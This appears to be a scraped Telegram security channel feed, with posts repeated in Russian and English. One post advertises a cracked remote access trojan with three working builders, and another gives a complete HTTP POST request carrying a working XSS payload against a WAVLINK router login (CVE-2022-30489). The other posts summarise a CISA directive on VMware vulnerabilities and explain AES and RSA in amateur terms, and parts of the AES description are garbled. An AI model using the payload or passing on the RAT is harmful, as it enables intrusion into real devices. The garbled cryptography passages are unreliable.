|887+1 Rat|
🛡Только в ознакомительных целях
Тут появилась одна настоящая крыса сразу с тремя рабочими билдерами, в своё время была крякнута и выброшена в открытое плавание.
🛡For educational purposes only!
Then there was one real rat with three working builders at once, at one time it was cracked and thrown into open swimming.
#RAT
🛡Только в ознакомительных целях
Тут появилась одна настоящая крыса сразу с тремя рабочими билдерами, в своё время была крякнута и выброшена в открытое плавание.
🛡For educational purposes only!
Then there was one real rat with three working builders at once, at one time it was cracked and thrown into open swimming.
#RAT
👍1
|Directive 22-03|
🤙Шизо на связи
📓Тут АКБИ(CISA) опубликовала директиву 22-03, которая требует от федеральных гражданских агентств исполнительной власти, в том случае если у них установлены продукты VMware, то они должны либо обновить, либо удалить до того момента, пока не будет установлено обновление безопасности.
Собственно, уязвимости из-за которых директива была выпущена экстренно:
CVE 2022-22954(ресёрчи), CVE 2022-22960, CVE-2022-22972, CVE-2022-22973. Конечно, ещё одной из причин публикации, как мне сообщил знакомый, который обладает большей информацией чем Шизо, является несколько кибер инцидентов в федеральных агентствах непосредственно из-за уязвимых и не обновлённых продуктов VMware.
Просто, атакующий может, проэксплуатировав одну из вышеописанных уязвимостей не проходя аутентефикацию и не повышая привилегии в системе, что позволяло ему произвести RCE.
Хотелось бы увидеть похожие документы в России и аналог CISA, ибо многие системы не обновляются годами в гос секторе. Также, CISA опубликовали бюллетень по кибербезопасности, помогающий в обнаружении и реагированию на угрозы(инциденты), а также как уменьшить ущерб после кибер инцидента.
Так что, обновляйте ПО, следите за новостями, обнаружением новых уязвимостей, следите за патчами безопасности и читайте работы, описывающие контрмеры различным векторам атак(эксплуатации уязвимостей).
📕Саму директиву 22-03 можно почитать тут.
🤙 The Shizo is in touch
📓 Here CISA published Directive 22-03, which requires federal civil agencies of the executive branch, if they have VMware products installed, they must either update or delete until a security update is installed.
Actually, the vulnerabilities due to which the directive was issued urgently:
CVE 2022-22954(research), CVE 2022-22960, CVE-2022-22972, CVE-2022-22973. Of course, another reason for the publication, as I was informed by a friend who has more information than the Schizo, is several cyber incidents in federal agencies directly due to vulnerable and not updated VMware products.
Simply, an attacker can exploit one of the vulnerabilities described above without undergoing authentication and without increasing privileges in the system, which allowed him to make an RCE.
I would like to see similar documents in Russia, because many systems have not been updated for years in the state sector. Also, CISA has published a cybersecurity bulletin that helps in detecting and responding to threats (incidents), as well as how to reduce damage after a cyber incident.
So, update the software, follow the news, the discovery of new vulnerabilities, keep an eye on security patches and read works describing countermeasures to various attack vectors (exploiting vulnerabilities).
📕The directive 22-03 itself can be read here.
#CISA #expoitation #rce #cve #security
🤙Шизо на связи
📓Тут АКБИ(CISA) опубликовала директиву 22-03, которая требует от федеральных гражданских агентств исполнительной власти, в том случае если у них установлены продукты VMware, то они должны либо обновить, либо удалить до того момента, пока не будет установлено обновление безопасности.
Собственно, уязвимости из-за которых директива была выпущена экстренно:
CVE 2022-22954(ресёрчи), CVE 2022-22960, CVE-2022-22972, CVE-2022-22973. Конечно, ещё одной из причин публикации, как мне сообщил знакомый, который обладает большей информацией чем Шизо, является несколько кибер инцидентов в федеральных агентствах непосредственно из-за уязвимых и не обновлённых продуктов VMware.
Просто, атакующий может, проэксплуатировав одну из вышеописанных уязвимостей не проходя аутентефикацию и не повышая привилегии в системе, что позволяло ему произвести RCE.
Хотелось бы увидеть похожие документы в России и аналог CISA, ибо многие системы не обновляются годами в гос секторе. Также, CISA опубликовали бюллетень по кибербезопасности, помогающий в обнаружении и реагированию на угрозы(инциденты), а также как уменьшить ущерб после кибер инцидента.
Так что, обновляйте ПО, следите за новостями, обнаружением новых уязвимостей, следите за патчами безопасности и читайте работы, описывающие контрмеры различным векторам атак(эксплуатации уязвимостей).
📕Саму директиву 22-03 можно почитать тут.
🤙 The Shizo is in touch
📓 Here CISA published Directive 22-03, which requires federal civil agencies of the executive branch, if they have VMware products installed, they must either update or delete until a security update is installed.
Actually, the vulnerabilities due to which the directive was issued urgently:
CVE 2022-22954(research), CVE 2022-22960, CVE-2022-22972, CVE-2022-22973. Of course, another reason for the publication, as I was informed by a friend who has more information than the Schizo, is several cyber incidents in federal agencies directly due to vulnerable and not updated VMware products.
Simply, an attacker can exploit one of the vulnerabilities described above without undergoing authentication and without increasing privileges in the system, which allowed him to make an RCE.
I would like to see similar documents in Russia, because many systems have not been updated for years in the state sector. Also, CISA has published a cybersecurity bulletin that helps in detecting and responding to threats (incidents), as well as how to reduce damage after a cyber incident.
So, update the software, follow the news, the discovery of new vulnerabilities, keep an eye on security patches and read works describing countermeasures to various attack vectors (exploiting vulnerabilities).
📕The directive 22-03 itself can be read here.
#CISA #expoitation #rce #cve #security
Cybersecurity and Infrastructure Security Agency CISA
ED 22-03: Mitigate VMware Vulnerabilities | CISA
This page contains a web-friendly version of the Cybersecurity and Infrastructure Security Agency’s Emergency Directive 22-03, “Mitigate VMware
👍2
Forwarded from Private Shizo
🦠WAVLINK WN535G3 POST XSS(CVE-2022-30489)
🛡Только в ознакомительных целях!
🛡For educational purposes only!
Payload:
🛡Только в ознакомительных целях!
🛡For educational purposes only!
Payload:
POST /cgi-bin/login.cgi HTTP/1.1 Host: 98.127.66.193 Content-Length: 255 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://98.127.66.193 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://98.127.66.193/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close newUI=1&page=login&username=admin&langChange=0&ipaddr=171.113.240.243&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")</><>alert(1)</>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn🥰2
🔥В течение часа-двух(пока дописываю/редактирую) выйдет серия постов про шифрования, советую прочитать полностью.
🔥Within an hour or two (while I'm finishing / editing), a series of posts about encryption will be released, I advise you to read in full.
🔥Within an hour or two (while I'm finishing / editing), a series of posts about encryption will be released, I advise you to read in full.
❤5🔥1🤔1
|Шифрование SMS часть 1/2|
Шизо на связи!
😁Чтобы не растягивать на два поста, объединю в один.
Сегодня пойдёт речь шифрование SMS-сообщений с помощью симметричного блочного алгоритма шифрования AES и ассиметричного алгоритма шифрования RSA(даже сказал бы, что криптосистема) на ведроиде.
Сперва нужно немного дать вводных.
Так как я - просто энтузиаст, который всего лишь одно время баловался с криптографией(писал простейшие алгоритмы шифрования), то как минимум - советую почитать базовые понятия у Брюса Шнайера.
В AES размер одного блока равен 128бит, а размерность(длина) ключа шифрования может быть 128/192/256. На всякий случай напишу, что в симметричных алгоритмах шифрования используется только один криптографический ключ для расшифроки и шифрования информации.
Что вообще означает, что алгоритм является блочным, а очень просто: в блоках обрабатываемых данных подстановка и перестановка цифр.
Есть пять основных систем для блочных шифров:
🔐ECB - происходит разделение текста на определённое количество идентичных сегментов, которые впоследствии шифруются
🔐CBC - открытый текст(тот, который вследствие превращается в шифротекст) разбивается на несколько маленьких сегментов, в случае если последний блок будет меньше стандартной длины(128 бит), то он дополняется до неё. Шифрование происходит с использованием предыдущего зашифрованного блока, причём для первого - не существует предыдущий(для этого используется вектор инициализации.
Как один из недостатков выделяют то, что можно определить начало изменения данных по изменению шифротекста, хотя это далеко не просто во многих случаях.
🔐CTR - это пожалуй один из любимых мною режимов, так как довольно прост и математические операции выстроены таким образом, что он ещё и быстрый, вдобавок есть распраллеливание, чего нет в CBC. Его я точно просто не объясню, и пытаться рассказывать по самосинхронный оператор, далее его выход после шифрования с использованием ключа и результат XOR простого текста получают шифротекст, эквивалентный одному шифру за раз. Вообще, он называется режимом счётчика.
🔐CFB - режим обратной связи по шифротексту.
🔐OFB - режим обратной связи по выходу.
🔐Ну и ещё есть PCBC - режим распространяющегося сцепления блоков шифра, про который лучше почитать самому, хотя в случае шифрования SMS даже бы и не рассматривал его.
Теперь, постараюсь вкратце объяснить, как работает сам алгоритм шифрования. Как уже упомянул размер одного блока - 128 бит, которые ещё вдобавок разделены на матрицу 16х128 с XNUMX байтами.
Каждый байт заменяется посредством заблаговременно определённой таблицей, далее берётся каждая матрица 4 x 4 и происходит перемещение: байты во второй строке сдвигаются на один пробел влево, байты в третьей строке перемещаются на два пробела и четвертые байты сдвигаются на три, чтобы окончательно смешать столбцы и добавить начальный ключ к набору и начать заново.
Это даёт нам шифротекст, который можно сказать является противоположностью открытому тексту(не имеет ничего с ним общего). А для расшифроки шифротекста требуется произвести обратные действия, применив криптографический ключ. Хочу отметить, что на данный момент AES-256 является криптостойким, конечно, если противник не АНБ или ЦРУ или ФБР. Отмечу заранее, что для шифрования SMS - не особо подходит, ибо нужен закрытый и зашифрованный канал связи для передачи криптографического ключа.
Конечно, реализация алгоритма намного сложнее чем я описал, но Шизо уже ШизоКубитик и хочется перейти к разговору про RSA и наконец про шифрование SMS с их использованием.
Про RSA особо рассказывать не стоит, ибо он на слуху, используется в криптосистеме PGP. Он является ассиметричным, что означает использование двух ключей:открытого и закрытого, по -другому ещё называются двуключевыми, что более понятно для обывателя.
Что не мало важно, эту криптосистему можно использовать ещё для работы с цифровыми подписями. Как пример до кучи можно привести TLS/SSL, в которых используется RSA.
Описание генерации ключей в RSA привожу на скриншоте3.
#shizo #cryptography #gsm #sms
Шизо на связи!
😁Чтобы не растягивать на два поста, объединю в один.
Сегодня пойдёт речь шифрование SMS-сообщений с помощью симметричного блочного алгоритма шифрования AES и ассиметричного алгоритма шифрования RSA(даже сказал бы, что криптосистема) на ведроиде.
Сперва нужно немного дать вводных.
Так как я - просто энтузиаст, который всего лишь одно время баловался с криптографией(писал простейшие алгоритмы шифрования), то как минимум - советую почитать базовые понятия у Брюса Шнайера.
В AES размер одного блока равен 128бит, а размерность(длина) ключа шифрования может быть 128/192/256. На всякий случай напишу, что в симметричных алгоритмах шифрования используется только один криптографический ключ для расшифроки и шифрования информации.
Что вообще означает, что алгоритм является блочным, а очень просто: в блоках обрабатываемых данных подстановка и перестановка цифр.
Есть пять основных систем для блочных шифров:
🔐ECB - происходит разделение текста на определённое количество идентичных сегментов, которые впоследствии шифруются
🔐CBC - открытый текст(тот, который вследствие превращается в шифротекст) разбивается на несколько маленьких сегментов, в случае если последний блок будет меньше стандартной длины(128 бит), то он дополняется до неё. Шифрование происходит с использованием предыдущего зашифрованного блока, причём для первого - не существует предыдущий(для этого используется вектор инициализации.
Как один из недостатков выделяют то, что можно определить начало изменения данных по изменению шифротекста, хотя это далеко не просто во многих случаях.
🔐CTR - это пожалуй один из любимых мною режимов, так как довольно прост и математические операции выстроены таким образом, что он ещё и быстрый, вдобавок есть распраллеливание, чего нет в CBC. Его я точно просто не объясню, и пытаться рассказывать по самосинхронный оператор, далее его выход после шифрования с использованием ключа и результат XOR простого текста получают шифротекст, эквивалентный одному шифру за раз. Вообще, он называется режимом счётчика.
🔐CFB - режим обратной связи по шифротексту.
🔐OFB - режим обратной связи по выходу.
🔐Ну и ещё есть PCBC - режим распространяющегося сцепления блоков шифра, про который лучше почитать самому, хотя в случае шифрования SMS даже бы и не рассматривал его.
Теперь, постараюсь вкратце объяснить, как работает сам алгоритм шифрования. Как уже упомянул размер одного блока - 128 бит, которые ещё вдобавок разделены на матрицу 16х128 с XNUMX байтами.
Каждый байт заменяется посредством заблаговременно определённой таблицей, далее берётся каждая матрица 4 x 4 и происходит перемещение: байты во второй строке сдвигаются на один пробел влево, байты в третьей строке перемещаются на два пробела и четвертые байты сдвигаются на три, чтобы окончательно смешать столбцы и добавить начальный ключ к набору и начать заново.
Это даёт нам шифротекст, который можно сказать является противоположностью открытому тексту(не имеет ничего с ним общего). А для расшифроки шифротекста требуется произвести обратные действия, применив криптографический ключ. Хочу отметить, что на данный момент AES-256 является криптостойким, конечно, если противник не АНБ или ЦРУ или ФБР. Отмечу заранее, что для шифрования SMS - не особо подходит, ибо нужен закрытый и зашифрованный канал связи для передачи криптографического ключа.
Конечно, реализация алгоритма намного сложнее чем я описал, но Шизо уже ШизоКубитик и хочется перейти к разговору про RSA и наконец про шифрование SMS с их использованием.
Про RSA особо рассказывать не стоит, ибо он на слуху, используется в криптосистеме PGP. Он является ассиметричным, что означает использование двух ключей:открытого и закрытого, по -другому ещё называются двуключевыми, что более понятно для обывателя.
Что не мало важно, эту криптосистему можно использовать ещё для работы с цифровыми подписями. Как пример до кучи можно привести TLS/SSL, в которых используется RSA.
Описание генерации ключей в RSA привожу на скриншоте3.
#shizo #cryptography #gsm #sms
❤3